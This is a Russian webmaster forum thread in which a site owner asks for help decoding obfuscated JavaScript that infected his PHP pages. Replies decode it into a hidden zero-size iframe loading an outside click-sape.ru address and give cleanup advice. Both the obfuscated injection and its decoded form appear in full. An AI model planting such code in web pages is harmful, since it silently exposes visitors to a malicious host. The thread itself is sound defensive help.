Троян на сайте, помогите расшифровать

Статус
В этой теме нельзя размещать новые ответы.

bouton

Постоялец
Регистрация
6 Сен 2007
Сообщения
149
Реакции
27
Доброго времени суток. Сегодня обноружил на одном из своих сайтов вирус. Каспер не давал мне даже зайти на сайт. Обнаружилось что вирус добавлял в файлы index.php menu.php default.php вот этот год:

<script>
String.prototype.sdsd=function(d, o){return this.replace(d, o)};
var sadasd = '<KLiHKYfJYrNAaLJ5mAHeH @sLrY@cNH=Y@\'JLhY5tYY5tKpL@J:N/N/J@@c5l5i5Yc5LkKK-@NAsJa@Hp@HYeNJ.JcHHoKmHL/Li@Jn5.NKcKKLgKNiH?J2K\'Y @LwLYiKdJJJtH5hKL=N@\'L0AHp@5xY@\'KL Hh5JeHi@@gKYNh@AtAKL=N\'JJ0YpNHx5\'L Y5s5A5t@JyKAlL@HeL=\'5JvYAiALKsNiANbLJLiHlAiNtJ@Ly@:5 YhHiNNdd5JeHn55N;L JYYbYNoJrL@dAL5eJrHA:H AKnAAoKYLnAK5eJA;L5\'LN>AK<H/NiLfYY@rKHAaHLm@AeL>K'.sdsd(/[K5JANHYL@]/g,'');
document.write(sadasd);
</script>

Я удалил все его проделки но вот боюсь повторения этого.

Как мне расшифровать это дело? Кто нибудь может помочь? И ещё встречался ли кто нибудь с данным зверем, как его победить.
Спасибо за помощь
 

Belial

Постоялец
Регистрация
1 Фев 2010
Сообщения
235
Реакции
113
Зачем же на живом, сохраняешь этот код в хтмл файл, меняешь и смотришь. Ифрейм там.
 

shamantc

ЗлОй ШаМан
Регистрация
3 Ноя 2008
Сообщения
651
Реакции
188
  • Заблокирован
  • #5
HTML:
<iframe src='http://click-sape.ru/in.cgi?2' width='0px' height='0px' style='visibility:hidden; border:none;'></iframe>
 

Andrey-varvara

Постоялец
Регистрация
1 Май 2007
Сообщения
73
Реакции
98
Чтоб такое не повторилось:
1. скачай CureIT, проверь им те компы/ноутбуки с которых заходил по ФТП на сайт. 100% вирусня у тебя.
2. Поменяй пароль на фтп
3. Делай сложные пароли и НИКОГДА не храни их в ФТП менеджерах
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху